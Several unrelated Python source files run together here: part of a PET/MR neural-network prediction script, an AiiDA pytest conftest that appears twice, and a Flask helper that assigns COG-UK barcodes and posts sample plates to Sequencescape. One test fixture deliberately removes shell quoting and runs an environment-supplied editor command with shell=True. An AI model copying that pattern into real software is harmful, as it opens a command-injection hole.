parser.add_argument('--output_on_mr_grid', help = 'regrid the CNN output to the original MR grid', action = 'store_true') args = parser.parse_args() #------------------------------------------------------------------------------------------------- # load modules import pyapetnet from pyapetnet.preprocessing import preprocess_volumes from pyapetnet.utils import load_nii_in_ras from pymirc.fileio import DicomVolume, write_3d_static_dicom import nibabel as nib import json import tensorflow as tf import numpy as np import matplotlib.pyplot as plt import pymirc.viewer as pv from pymirc.image_operations import aff_transform from pyapetnet.utils import flip_ras_lps, pet_dcm_keys_to_copy from warnings import warn #------------------------------------------------------------------------------------------------- # parse input parameters pet_dcm_dir = args.pet_dcm_dir mr_dcm_dir = args.mr_dcm_dir pet_dcm_pattern = args.pet_dcm_pattern mr_dcm_pattern = args.mr_dcm_pattern model_name = args.model_name output_dir = args.output_dir output_name = args.output_name if output_name is None: output_name = f'prediction_{model_name}' model_path = args.model_path if model_path is None: model_path = os.path.join(os.path.dirname(pyapetnet.__file__),'trained_models') coreg_inputs = not args.no_coreg crop_mr = not args.no_crop show = args.show verbose = args.verbose save_preproc = not args.no_preproc_save output_on_mr_grid = args.output_on_mr_grid #------------------------------------------------------------------------------------------------- # load the trained model co ={'ssim_3d_loss': None,'mix_ssim_3d_mae_loss': None} if verbose: print('loading CNN {os.path.join(model_path, model_name)}') model = tf.keras.models.load_model(os.path.join(model_path, model_name), custom_objects = co) # load the voxel size used for training with open(os.path.join(model_path, model_name, 'config.json')) as f: cfg = json.load(f) training_voxsize = cfg['internal_voxsize']*np.ones(3) #------------------------------------------------------------------ # load and preprocess the input PET and MR volumes pet_dcm = DicomVolume(os.path.join(pet_dcm_dir, pet_dcm_pattern)) mr_dcm = DicomVolume(os.path.join(mr_dcm_dir, mr_dcm_pattern)) pet = pet_dcm.get_data() mr = mr_dcm.get_data() pet_affine = pet_dcm.affine mr_affine = mr_dcm.affine # preprocess the input volumes (coregistration, interpolation and intensity normalization) pet_preproc, mr_preproc, o_aff, pet_scale, mr_scale = preprocess_volumes(pet, mr, pet_affine, mr_affine, training_voxsize, perc = 99.99, coreg = coreg_inputs, crop_mr = crop_mr) #------------------------------------------------------------------ # the actual CNN prediction x = [np.expand_dims(np.expand_dims(pet_preproc,0),-1), np.expand_dims(np.expand_dims(mr_preproc,0),-1)] pred = model.predict(x).squeeze() # undo the intensity normalization pred *= pet_scale pet_preproc *= pet_scale mr_preproc *= mr_scale #------------------------------------------------------------------ # save the preprocessed input and output # dicom volumes are read as LPS, but nifti volumes have to be in RAS os.makedirs(output_dir, exist_ok = True) if save_preproc: nib.save(nib.Nifti1Image(*flip_ras_lps(pet_preproc, o_aff)), os.path.join(output_dir, 'pet_preproc.nii')) if verbose: print('wrote pre-processed PET to: {os.path.join(output_dir, "pet_preproc.nii")}') nib.save(nib.Nifti1Image(*flip_ras_lps(mr_preproc, o_aff)), os.path.join(output_dir, 'mr_preproc.nii')) if verbose: print('wrote pre-processed MR to: {os.path.join(output_dir, "mr_preproc.nii")}') # save the intensity normalization factors np.savetxt(os.path.join(output_dir, 'preproc_scaling_factors.txt'), np.array([pet_scale,mr_scale])) if verbose: print('wrote scaling factors to: {os.path.join(output_dir, "preproc_scaling_factors.txt")}') if output_on_mr_grid: oss = np.ceil(np.linalg.norm(mr_affine[:-1,:-1], axis = 0)/training_voxsize).astype(int) pred_regrid = aff_transform(pred, np.linalg.inv(o_aff) @ mr_affine, mr.shape, cval = pred.min(), os0 = oss[0], os1 = oss[1], os2 = oss[2]) nib.save(nib.Nifti1Image(*flip_ras_lps(pred_regrid, mr_affine)), os.path.join(output_dir, f'{output_name}.nii')) else: nib.save(nib.Nifti1Image(*flip_ras_lps(pred, o_aff)), os.path.join(output_dir, f'{output_name}.nii')) #------------------------------------------------------------------ # save prediction also as dicom # get a list of dicom keys to copy from the original PET dicom header dcm_kwargs = {} for key in pet_dcm_keys_to_copy(): try: dcm_kwargs[key] = getattr(pet_dcm.firstdcmheader,key) except AttributeError: warn('Cannot copy tag ' + key) # write the dicom volume output_dcm_dir = os.path.join(output_dir, output_name) if not os.path.exists(output_dcm_dir): if output_on_mr_grid: write_3d_static_dicom(pred_regrid, output_dcm_dir, affine = mr_affine, ReconstructionMethod = 'CNN MAP Bowsher', SeriesDescription = f'CNN MAP Bowsher {model_name}', **dcm_kwargs) else: write_3d_static_dicom(pred, output_dcm_dir, affine = o_aff, ReconstructionMethod = 'CNN MAP Bowsher', SeriesDescription = f'CNN MAP Bowsher {model_name}', **dcm_kwargs) else: warn('Output dicom directory already exists. Not ovewrting it') #------------------------------------------------------------------ # show the results if show: pmax = np.percentile(pred,99.9) mmax = np.percentile(mr_preproc,99.9) ims = [{'vmin':0, 'vmax': mmax, 'cmap': plt.cm.Greys_r}, {'vmin':0, 'vmax': pmax}, {'vmin':0, 'vmax': pmax}] vi = pv.ThreeAxisViewer([mr_preproc, pet_preproc, pred], imshow_kwargs = ims) plt.show()
# -*- coding: utf-8 -*- ########################################################################### # Copyright (c), The AiiDA team. All rights reserved. # # This file is part of the AiiDA code. # # # # The code is hosted on GitHub at https://github.com/aiidateam/aiida-core # # For further information on the license, see the LICENSE.txt file # # For further information please visit http://www.aiida.net # ########################################################################### # pylint: disable=redefined-outer-name """Configuration file for pytest tests.""" import os import pytest from aiida.manage.configuration import Config, Profile, get_config pytest_plugins = ['aiida.manage.tests.pytest_fixtures', 'sphinx.testing.fixtures'] # pylint: disable=invalid-name @pytest.fixture() def non_interactive_editor(request): """Fixture to patch click's `Editor.edit_file`. In `click==7.1` the `Editor.edit_file` command was changed to escape the `os.environ['EDITOR']` command. Our tests are currently abusing this variable to define an automated vim command in order to make an interactive command non-interactive, and escaping it makes bash interpret the command and its arguments as a single command instead. Here we patch the method to remove the escaping of the editor command. :param request: the command to set for the editor that is to be called """ from unittest.mock import patch from click._termui_impl import Editor os.environ['EDITOR'] = request.param os.environ['VISUAL'] = request.param def edit_file(self, filename): import subprocess import click editor = self.get_editor() if self.env: environ = os.environ.copy() environ.update(self.env) else: environ = None try: process = subprocess.Popen( f'{editor} {filename}', # This is the line that we change removing `shlex_quote` env=environ, shell=True, ) exit_code = process.wait() if exit_code != 0: raise click.ClickException(f'{editor}: Editing failed!') except OSError as exception: raise click.ClickException(f'{editor}: Editing failed: {exception}') with patch.object(Editor, 'edit_file', edit_file): yield @pytest.fixture(scope='function') def fixture_sandbox(): """Return a `SandboxFolder`.""" from aiida.common.folders import SandboxFolder with SandboxFolder() as folder: yield folder @pytest.fixture def generate_calc_job(): """Fixture to construct a new `CalcJob` instance and call `prepare_for_submission` for testing `CalcJob` classes. The fixture will return the `CalcInfo` returned by `prepare_for_submission` and the temporary folder that was passed to it, into which the raw input files will have been written. """ def _generate_calc_job(folder, entry_point_name, inputs=None, return_process=False): """Fixture to generate a mock `CalcInfo` for testing calculation jobs.""" from aiida.engine.utils import instantiate_process from aiida.manage.manager import get_manager from aiida.plugins import CalculationFactory inputs = inputs or {} manager = get_manager() runner = manager.get_runner() process_class = CalculationFactory(entry_point_name) process = instantiate_process(runner, process_class, **inputs) if return_process: return process return process.prepare_for_submission(folder) return _generate_calc_job @pytest.fixture def generate_work_chain(): """Generate an instance of a `WorkChain`.""" def _generate_work_chain(entry_point, inputs=None): """Generate an instance of a `WorkChain` with the given entry point and inputs. :param entry_point: entry point name of the work chain subclass. :param inputs: inputs to be passed to process construction. :return: a `WorkChain` instance. """ from aiida.engine.utils import instantiate_process from aiida.manage.manager import get_manager from aiida.plugins import WorkflowFactory inputs = inputs or {} process_class = WorkflowFactory(entry_point) if isinstance(entry_point, str) else entry_point runner = get_manager().get_runner() process = instantiate_process(runner, process_class, **inputs) return process return _generate_work_chain @pytest.fixture def generate_calculation_node(): """Generate an instance of a `CalculationNode`.""" from aiida.engine import ProcessState def _generate_calculation_node(process_state=ProcessState.FINISHED, exit_status=None, entry_point=None): """Generate an instance of a `CalculationNode`.. :param process_state: state to set :param exit_status: optional exit status, will be set to `0` if `process_state` is `ProcessState.FINISHED` :return: a `CalculationNode` instance. """ from aiida.orm import CalculationNode if process_state is ProcessState.FINISHED and exit_status is None: exit_status = 0 node = CalculationNode(process_type=entry_point) node.set_process_state(process_state) if exit_status is not None: node.set_exit_status(exit_status) return node return _generate_calculation_node @pytest.fixture def create_empty_config_instance(tmp_path) -> Config: """Create a temporary configuration instance. This creates a temporary directory with a clean `.aiida` folder and basic configuration file. The currently loaded configuration and profile are stored in memory and are automatically restored at the end of this context manager. :return: a new empty config instance. """ from aiida.common.utils import Capturing from aiida.manage import configuration from aiida.manage.configuration import settings, load_profile, reset_profile # Store the current configuration instance and config directory path current_config = configuration.CONFIG current_config_path = current_config.dirpath current_profile_name = configuration.PROFILE.name reset_profile() configuration.CONFIG = None # Create a temporary folder, set it as the current config directory path and reset the loaded configuration settings.AIIDA_CONFIG_FOLDER = str(tmp_path) # Create the instance base directory structure, the config file and a dummy profile settings.create_instance_directories() # The constructor of `Config` called by `load_config` will print warning messages about migrating it with Capturing(): configuration.CONFIG = configuration.load_config(create=True) yield get_config() # Reset the config folder path and the config instance. Note this will always be executed after the yield no # matter what happened in the test that used this fixture. reset_profile() settings.AIIDA_CONFIG_FOLDER = current_config_path configuration.CONFIG = current_config load_profile(current_profile_name) @pytest.fixture def create_profile() -> Profile: """Create a new profile instance. :return: the profile instance. """ def _create_profile(name, **kwargs): repository_dirpath = kwargs.pop('repository_dirpath', get_config().dirpath) profile_dictionary = { 'default_user': kwargs.pop('default_user', 'dummy@localhost'), 'database_engine': kwargs.pop('database_engine', 'postgresql_psycopg2'), 'database_backend': kwargs.pop('database_backend', 'django'), 'database_hostname': kwargs.pop('database_hostname', 'localhost'), 'database_port': kwargs.pop('database_port', 5432), 'database_name': kwargs.pop('database_name', name), 'database_username': kwargs.pop('database_username', 'user'), 'database_password': kwargs.pop('database_password', 'pass'), 'repository_uri': f"file:///{os.path.join(repository_dirpath, f"repository_{name}")}", } return Profile(name, profile_dictionary) return _create_profile @pytest.fixture def manager(aiida_profile): # pylint: disable=unused-argument """Get the ``Manager`` instance of the currently loaded profile.""" from aiida.manage.manager import get_manager return get_manager() @pytest.fixture def event_loop(manager): """Get the event loop instance of the currently loaded profile. This is automatically called as a fixture for any test marked with ``@pytest.mark.asyncio``. """ yield manager.get_runner().loop @pytest.fixture def backend(manager): """Get the ``Backend`` instance of the currently loaded profile.""" return manager.get_backend() @pytest.fixture def communicator(manager): """Get the ``Communicator`` instance of the currently loaded profile to communicate with RabbitMQ.""" return manager.get_communicator() @pytest.fixture def skip_if_not_django(backend): """Fixture that will skip any test that uses it when a profile is loaded with any other backend then Django.""" from aiida.orm.implementation.django.backend import DjangoBackend if not isinstance(backend, DjangoBackend): pytest.skip('this test should only be run for the Django backend.') @pytest.fixture def skip_if_not_sqlalchemy(backend): """Fixture that will skip any test that uses it when a profile is loaded with any other backend then SqlAlchemy.""" from aiida.orm.implementation.sqlalchemy.backend import SqlaBackend if not isinstance(backend, SqlaBackend): pytest.skip('this test should only be run for the SqlAlchemy backend.') @pytest.fixture(scope='function') def override_logging(): """Return a `SandboxFolder`.""" from aiida.common.log import configure_logging config = get_config() try: config.set_option('logging.aiida_loglevel', 'DEBUG') config.set_option('logging.db_loglevel', 'DEBUG') configure_logging(with_orm=True) yield finally: config.unset_option('logging.aiida_loglevel') config.unset_option('logging.db_loglevel') configure_logging(with_orm=True)
# -*- coding: utf-8 -*- ########################################################################### # Copyright (c), The AiiDA team. All rights reserved. # # This file is part of the AiiDA code. # # # # The code is hosted on GitHub at https://github.com/aiidateam/aiida-core # # For further information on the license, see the LICENSE.txt file # # For further information please visit http://www.aiida.net # ########################################################################### # pylint: disable=redefined-outer-name """Configuration file for pytest tests.""" import os import pytest from aiida.manage.configuration import Config, Profile, get_config pytest_plugins = ['aiida.manage.tests.pytest_fixtures', 'sphinx.testing.fixtures'] # pylint: disable=invalid-name @pytest.fixture() def non_interactive_editor(request): """Fixture to patch click's `Editor.edit_file`. In `click==7.1` the `Editor.edit_file` command was changed to escape the `os.environ['EDITOR']` command. Our tests are currently abusing this variable to define an automated vim command in order to make an interactive command non-interactive, and escaping it makes bash interpret the command and its arguments as a single command instead. Here we patch the method to remove the escaping of the editor command. :param request: the command to set for the editor that is to be called """ from unittest.mock import patch from click._termui_impl import Editor os.environ['EDITOR'] = request.param os.environ['VISUAL'] = request.param def edit_file(self, filename): import subprocess import click editor = self.get_editor() if self.env: environ = os.environ.copy() environ.update(self.env) else: environ = None try: process = subprocess.Popen( f'{editor} {filename}', # This is the line that we change removing `shlex_quote` env=environ, shell=True, ) exit_code = process.wait() if exit_code != 0: raise click.ClickException(f'{editor}: Editing failed!') except OSError as exception: raise click.ClickException(f'{editor}: Editing failed: {exception}') with patch.object(Editor, 'edit_file', edit_file): yield @pytest.fixture(scope='function') def fixture_sandbox(): """Return a `SandboxFolder`.""" from aiida.common.folders import SandboxFolder with SandboxFolder() as folder: yield folder @pytest.fixture def generate_calc_job(): """Fixture to construct a new `CalcJob` instance and call `prepare_for_submission` for testing `CalcJob` classes. The fixture will return the `CalcInfo` returned by `prepare_for_submission` and the temporary folder that was passed to it, into which the raw input files will have been written. """ def _generate_calc_job(folder, entry_point_name, inputs=None, return_process=False): """Fixture to generate a mock `CalcInfo` for testing calculation jobs.""" from aiida.engine.utils import instantiate_process from aiida.manage.manager import get_manager from aiida.plugins import CalculationFactory inputs = inputs or {} manager = get_manager() runner = manager.get_runner() process_class = CalculationFactory(entry_point_name) process = instantiate_process(runner, process_class, **inputs) if return_process: return process return process.prepare_for_submission(folder) return _generate_calc_job @pytest.fixture def generate_work_chain(): """Generate an instance of a `WorkChain`.""" def _generate_work_chain(entry_point, inputs=None): """Generate an instance of a `WorkChain` with the given entry point and inputs. :param entry_point: entry point name of the work chain subclass. :param inputs: inputs to be passed to process construction. :return: a `WorkChain` instance. """ from aiida.engine.utils import instantiate_process from aiida.manage.manager import get_manager from aiida.plugins import WorkflowFactory inputs = inputs or {} process_class = WorkflowFactory(entry_point) if isinstance(entry_point, str) else entry_point runner = get_manager().get_runner() process = instantiate_process(runner, process_class, **inputs) return process return _generate_work_chain @pytest.fixture def generate_calculation_node(): """Generate an instance of a `CalculationNode`.""" from aiida.engine import ProcessState def _generate_calculation_node(process_state=ProcessState.FINISHED, exit_status=None, entry_point=None): """Generate an instance of a `CalculationNode`.. :param process_state: state to set :param exit_status: optional exit status, will be set to `0` if `process_state` is `ProcessState.FINISHED` :return: a `CalculationNode` instance. """ from aiida.orm import CalculationNode if process_state is ProcessState.FINISHED and exit_status is None: exit_status = 0 node = CalculationNode(process_type=entry_point) node.set_process_state(process_state) if exit_status is not None: node.set_exit_status(exit_status) return node return _generate_calculation_node @pytest.fixture def create_empty_config_instance(tmp_path) -> Config: """Create a temporary configuration instance. This creates a temporary directory with a clean `.aiida` folder and basic configuration file. The currently loaded configuration and profile are stored in memory and are automatically restored at the end of this context manager. :return: a new empty config instance. """ from aiida.common.utils import Capturing from aiida.manage import configuration from aiida.manage.configuration import settings, load_profile, reset_profile # Store the current configuration instance and config directory path current_config = configuration.CONFIG current_config_path = current_config.dirpath current_profile_name = configuration.PROFILE.name reset_profile() configuration.CONFIG = None # Create a temporary folder, set it as the current config directory path and reset the loaded configuration settings.AIIDA_CONFIG_FOLDER = str(tmp_path) # Create the instance base directory structure, the config file and a dummy profile settings.create_instance_directories() # The constructor of `Config` called by `load_config` will print warning messages about migrating it with Capturing(): configuration.CONFIG = configuration.load_config(create=True) yield get_config() # Reset the config folder path and the config instance. Note this will always be executed after the yield no # matter what happened in the test that used this fixture. reset_profile() settings.AIIDA_CONFIG_FOLDER = current_config_path configuration.CONFIG = current_config load_profile(current_profile_name) @pytest.fixture def create_profile() -> Profile: """Create a new profile instance. :return: the profile instance. """ def _create_profile(name, **kwargs): repository_dirpath = kwargs.pop('repository_dirpath', get_config().dirpath) profile_dictionary = { 'default_user': kwargs.pop('default_user', 'dummy@localhost'), 'database_engine': kwargs.pop('database_engine', 'postgresql_psycopg2'), 'database_backend': kwargs.pop('database_backend', 'django'), 'database_hostname': kwargs.pop('database_hostname', 'localhost'), 'database_port': kwargs.pop('database_port', 5432), 'database_name': kwargs.pop('database_name', name), 'database_username': kwargs.pop('database_username', 'user'), 'database_password': kwargs.pop('database_password', 'pass'), 'repository_uri': f"file:///{os.path.join(repository_dirpath, f'repository_{name}')}", } return Profile(name, profile_dictionary) return _create_profile @pytest.fixture def manager(aiida_profile): # pylint: disable=unused-argument """Get the ``Manager`` instance of the currently loaded profile.""" from aiida.manage.manager import get_manager return get_manager() @pytest.fixture def event_loop(manager): """Get the event loop instance of the currently loaded profile. This is automatically called as a fixture for any test marked with ``@pytest.mark.asyncio``. """ yield manager.get_runner().loop @pytest.fixture def backend(manager): """Get the ``Backend`` instance of the currently loaded profile.""" return manager.get_backend() @pytest.fixture def communicator(manager): """Get the ``Communicator`` instance of the currently loaded profile to communicate with RabbitMQ.""" return manager.get_communicator() @pytest.fixture def skip_if_not_django(backend): """Fixture that will skip any test that uses it when a profile is loaded with any other backend then Django.""" from aiida.orm.implementation.django.backend import DjangoBackend if not isinstance(backend, DjangoBackend): pytest.skip('this test should only be run for the Django backend.') @pytest.fixture def skip_if_not_sqlalchemy(backend): """Fixture that will skip any test that uses it when a profile is loaded with any other backend then SqlAlchemy.""" from aiida.orm.implementation.sqlalchemy.backend import SqlaBackend if not isinstance(backend, SqlaBackend): pytest.skip('this test should only be run for the SqlAlchemy backend.') @pytest.fixture(scope='function') def override_logging(): """Return a `SandboxFolder`.""" from aiida.common.log import configure_logging config = get_config() try: config.set_option('logging.aiida_loglevel', 'DEBUG') config.set_option('logging.db_loglevel', 'DEBUG') configure_logging(with_orm=True) yield finally: config.unset_option('logging.aiida_loglevel') config.unset_option('logging.db_loglevel') configure_logging(with_orm=True)
import copy import logging from http import HTTPStatus from typing import Any, Dict, List, Optional import requests from flask import current_app as app from lighthouse.constants import ( FIELD_COG_BARCODE, FIELD_COORDINATE, FIELD_DART_CONTROL, FIELD_DART_DESTINATION_BARCODE, FIELD_DART_DESTINATION_COORDINATE, FIELD_DART_LAB_ID, FIELD_DART_RNA_ID, FIELD_DART_ROOT_SAMPLE_ID, FIELD_DART_SOURCE_BARCODE, FIELD_DART_SOURCE_COORDINATE, FIELD_LAB_ID, FIELD_PLATE_BARCODE, FIELD_RESULT, FIELD_RNA_ID, FIELD_ROOT_SAMPLE_ID, FIELD_SOURCE, POSITIVE_SAMPLES_MONGODB_FILTER, STAGE_MATCH_POSITIVE, ) from lighthouse.exceptions import ( DataError, MissingCentreError, MissingSourceError, MultipleCentresError, ) from lighthouse.helpers.dart_db import find_dart_source_samples_rows from lighthouse.helpers.mysql_db import create_mysql_connection_engine, get_table from sqlalchemy.sql.expression import and_ # type: ignore from sqlalchemy.sql.expression import bindparam # type: ignore logger = logging.getLogger(__name__) class UnmatchedSampleError(Exception): pass def add_cog_barcodes(samples: List[Dict[str, str]]) -> Optional[str]: centre_name = confirm_centre(samples) centre_prefix = get_centre_prefix(centre_name) num_samples = len(samples) logger.info(f"Getting COG-UK barcodes for {num_samples} samples") baracoda_url = ( f"http://{app.config["BARACODA_URL"]}" f"/barcodes_group/{centre_prefix}/new?count={num_samples}" ) retries = app.config["BARACODA_RETRY_ATTEMPTS"] success_operation = False except_obj = None while retries > 0: try: response = requests.post(baracoda_url) if response.status_code == HTTPStatus.CREATED: success_operation = True retries = 0 barcodes = response.json()["barcodes_group"]["barcodes"] for (sample, barcode) in zip(samples, barcodes): sample[FIELD_COG_BARCODE] = barcode else: retries = retries - 1 logger.error("Unable to create COG barcodes") logger.error(response.json()) except_obj = Exception("Unable to create COG barcodes") except requests.ConnectionError: retries = retries - 1 logger.error("Unable to access baracoda") except_obj = requests.ConnectionError("Unable to access baracoda") if not success_operation and except_obj is not None: raise except_obj # return centre prefix # TODO: I didn't know how else to get centre prefix? return centre_prefix def get_centre_prefix(centre_name: str) -> Optional[str]: logger.debug(f"Getting the prefix for '{centre_name}'") try: #  get the centre collection centres = app.data.driver.db.centres # use a case insensitive search for the centre name filter = {"name": {"$regex": f"^(?i){centre_name}$"}} assert centres.count_documents(filter) == 1 centre = centres.find_one(filter) prefix = centre["prefix"] logger.debug(f"Prefix for '{centre_name}' is '{prefix}'") return prefix except Exception as e: logger.exception(e) return None except AssertionError as e: logger.exception(e) raise DataError("Multiple centres with the same name") def find_samples(query: Dict[str, Any]) -> Optional[List[Dict[str, Any]]]: if query is None: return None samples = app.data.driver.db.samples samples_for_barcode = list(samples.find(query)) logger.info(f"Found {len(samples_for_barcode)} samples") return samples_for_barcode def count_samples(query: Dict[str, Any]) -> int: samples = app.data.driver.db.samples return samples.count_documents(query) # TODO: remove once we are sure that we dont need anything other than positives def get_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]: samples_for_barcode = find_samples({FIELD_PLATE_BARCODE: plate_barcode}) return samples_for_barcode def get_positive_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]: """Get a list of documents which correspond to filtered positive samples for a specific plate. Args: plate_barcode (str): the barcode of the plate to get samples for. Returns: Optional[List[Dict[str, Any]]]: the list of samples for this plate. """ samples_collection = app.data.driver.db.samples # The pipeline defines stages which execute in sequence pipeline = [ # 1. We are only interested in the samples for a particular plate {"$match": {FIELD_PLATE_BARCODE: plate_barcode}}, # 2. Then run the positive match stage STAGE_MATCH_POSITIVE, ] samples_for_barcode = list(samples_collection.aggregate(pipeline)) logger.info(f"Found {len(samples_for_barcode)} samples") return samples_for_barcode def count_positive_samples(plate_barcode: str) -> int: query_filter = copy.deepcopy(POSITIVE_SAMPLES_MONGODB_FILTER) query_filter[FIELD_PLATE_BARCODE] = plate_barcode samples_for_barcode = count_samples(query_filter) return samples_for_barcode def has_sample_data(plate_barcode: str) -> bool: sample_count = count_samples({FIELD_PLATE_BARCODE: plate_barcode}) return sample_count > 0 def row_is_normal_sample(row): control_value = getattr(row, FIELD_DART_CONTROL) return control_value is None or control_value == "NULL" or control_value == "" def rows_without_controls(rows): list = [] for row in rows: if row_is_normal_sample(row): list.append(row) return list def rows_with_controls(rows): list = [] for row in rows: if not row_is_normal_sample(row): list.append(row) return list def query_for_cherrypicked_samples(rows): if rows is None or (len(rows) == 0): return None mongo_query = [] for row in rows_without_controls(rows): sample_query = { FIELD_ROOT_SAMPLE_ID: getattr(row, FIELD_DART_ROOT_SAMPLE_ID), FIELD_RNA_ID: getattr(row, FIELD_DART_RNA_ID), FIELD_LAB_ID: getattr(row, FIELD_DART_LAB_ID), } mongo_query.append(sample_query) return {"$or": mongo_query} def equal_row_and_sample(row, sample): return ( (sample[FIELD_ROOT_SAMPLE_ID] == getattr(row, FIELD_DART_ROOT_SAMPLE_ID)) and (sample[FIELD_RNA_ID] == getattr(row, FIELD_DART_RNA_ID)) and (sample[FIELD_LAB_ID] == getattr(row, FIELD_DART_LAB_ID)) ) def find_sample_matching_row(row, samples): for pos in range(0, len(samples)): sample = samples[pos] if equal_row_and_sample(row, sample): return sample return None def join_rows_with_samples(rows, samples): records = [] for row in rows_without_controls(rows): records.append({"row": row_to_dict(row), "sample": find_sample_matching_row(row, samples)}) return records def add_controls_to_samples(rows, samples): control_samples = [] for row in rows_with_controls(rows): control_samples.append({"row": row_to_dict(row), "sample": None}) return samples + control_samples def check_matching_sample_numbers(rows, samples): if len(samples) != len(rows_without_controls(rows)): msg = ( "Mismatch in data present for destination plate: number of samples in DART and Mongo " "does not match" ) logger.error(msg) raise UnmatchedSampleError(msg) def row_to_dict(row): columns = [ FIELD_DART_DESTINATION_BARCODE, FIELD_DART_DESTINATION_COORDINATE, FIELD_DART_SOURCE_BARCODE, FIELD_DART_SOURCE_COORDINATE, FIELD_DART_CONTROL, FIELD_DART_ROOT_SAMPLE_ID, FIELD_DART_RNA_ID, FIELD_DART_LAB_ID, ] obj = {} for column in columns: obj[column] = getattr(row, column) return obj def get_cherrypicked_samples_records(barcode): rows = find_dart_source_samples_rows(barcode) samples = find_samples(query_for_cherrypicked_samples(rows)) return join_rows_with_samples(rows, samples) def confirm_centre(samples: List[Dict[str, str]]) -> str: """Confirm that the centre for all the samples is populated and the same and return the centre name Arguments: samples {List} -- the list of samples to check Returns: str -- the name of the centre for these samples """ logger.debug("confirm_centre()") try: # check that the 'source' field has a valid name for sample in samples: if not sample[FIELD_SOURCE]: raise MissingCentreError(sample) # create a set from the 'source' field to check we only have 1 unique centre for these # samples centre_set = {sample[FIELD_SOURCE] for sample in samples} except KeyError: raise MissingSourceError() else: if len(centre_set) > 1: raise MultipleCentresError() return centre_set.pop() def create_post_body(barcode: str, samples: List[Dict[str, str]]) -> Dict[str, Any]: logger.debug(f"Creating POST body to send to SS for barcode '{barcode}'") wells_content = {} for sample in samples: for key, value in sample.items(): if key.strip() == FIELD_RESULT: phenotype = value if key.strip() == FIELD_ROOT_SAMPLE_ID: description = value assert phenotype is not None assert sample[FIELD_COG_BARCODE] is not None well = { "content": { "phenotype": phenotype.strip().lower(), "supplier_name": sample[FIELD_COG_BARCODE], "sample_description": description, } } wells_content[sample[FIELD_COORDINATE]] = well body = { "barcode": barcode, "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE"], "study_uuid": app.config["SS_UUID_STUDY"], "wells": wells_content, } return {"data": {"type": "plates", "attributes": body}} def send_to_ss(body: Dict[str, Any]) -> requests.Response: ss_url = f"http://{app.config["SS_HOST"]}/api/v2/heron/plates" logger.info(f"Sending {body} to {ss_url}") headers = {"X-Sequencescape-Client-Id": app.config["SS_API_KEY"]} try: response = requests.post(ss_url, json=body, headers=headers) logger.debug(response.status_code) except requests.ConnectionError: raise requests.ConnectionError("Unable to access SS") return response def update_mlwh_with_cog_uk_ids(samples: List[Dict[str, str]]) -> None: """Update the MLWH to write the COG UK barcode for each sample. Arguments: samples {List[Dict[str, str]]} -- list of samples to be updated """ if len(samples) == 0: return None # assign db_connection to avoid UnboundLocalError in 'finally' block, in case of exception db_connection = None try: data = [] for sample in samples: # using 'b_' prefix for the keys because bindparam() doesn't allow you to use the real # column names data.append( { "b_root_sample_id": sample[FIELD_ROOT_SAMPLE_ID], "b_rna_id": sample[FIELD_RNA_ID], "b_result": sample[FIELD_RESULT], "b_cog_uk_id": sample[FIELD_COG_BARCODE], } ) sql_engine = create_mysql_connection_engine( app.config["WAREHOUSES_RW_CONN_STRING"], app.config["ML_WH_DB"] ) table = get_table(sql_engine, app.config["MLWH_LIGHTHOUSE_SAMPLE_TABLE"]) stmt = ( table.update() .where( and_( table.c.root_sample_id == bindparam("b_root_sample_id"), table.c.rna_id == bindparam("b_rna_id"), table.c.result == bindparam("b_result"), ) ) .values(cog_uk_id=bindparam("b_cog_uk_id")) ) db_connection = sql_engine.connect() results = db_connection.execute(stmt, data) rows_matched = results.rowcount if rows_matched != len(samples): msg = f""" Updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK ids was only partially successful. Only {rows_matched} of the {len(samples)} samples had matches in the MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table. """ logger.error(msg) raise UnmatchedSampleError(msg) except (Exception) as e: msg = f""" Error while updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK ids. {type(e).__name__}: {str(e)} """ logger.error(msg) raise finally: if db_connection is not None: db_connection.close() def map_to_ss_columns(samples: List[Dict[str, Any]]) -> List[Dict[str, Any]]: mapped_samples = [] for sample in samples: mapped_sample = {} # type: Dict[str, Any] mongo_row = sample["sample"] dart_row = sample["row"] try: if dart_row[FIELD_DART_CONTROL]: mapped_sample["control"] = True mapped_sample["control_type"] = dart_row[FIELD_DART_CONTROL] else: mapped_sample["name"] = mongo_row[FIELD_RNA_ID] mapped_sample["sample_description"] = mongo_row[FIELD_ROOT_SAMPLE_ID] mapped_sample["supplier_name"] = mongo_row[FIELD_COG_BARCODE] mapped_sample["phenotype"] = "positive" mapped_sample["coordinate"] = dart_row[FIELD_DART_DESTINATION_COORDINATE] mapped_sample["barcode"] = dart_row[FIELD_DART_DESTINATION_BARCODE] except KeyError as e: msg = f""" Error while mapping database columns to Sequencescape columns for sample {mongo_row[FIELD_ROOT_SAMPLE_ID]}. {type(e).__name__}: {str(e)} """ logger.error(msg) raise mapped_samples.append(mapped_sample) return mapped_samples def create_cherrypicked_post_body(barcode: str, samples: List[Dict[str, Any]]) -> Dict[str, Any]: logger.debug( f"Creating POST body to send to SS for cherrypicked plate with barcode '{barcode}'" ) wells_content = {} for sample in samples: content = {} if "control" in sample: content["control"] = sample["control"] content["control_type"] = sample["control_type"] else: content["name"] = sample["name"] content["phenotype"] = sample["phenotype"] content["supplier_name"] = sample["supplier_name"] content["sample_description"] = sample["sample_description"] wells_content[sample["coordinate"]] = {"content": content} body = { "barcode": barcode, "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE_CHERRYPICKED"], "study_uuid": app.config["SS_UUID_STUDY_CHERRYPICKED"], "wells": wells_content, } return {"data": {"type": "plates", "attributes": body}}
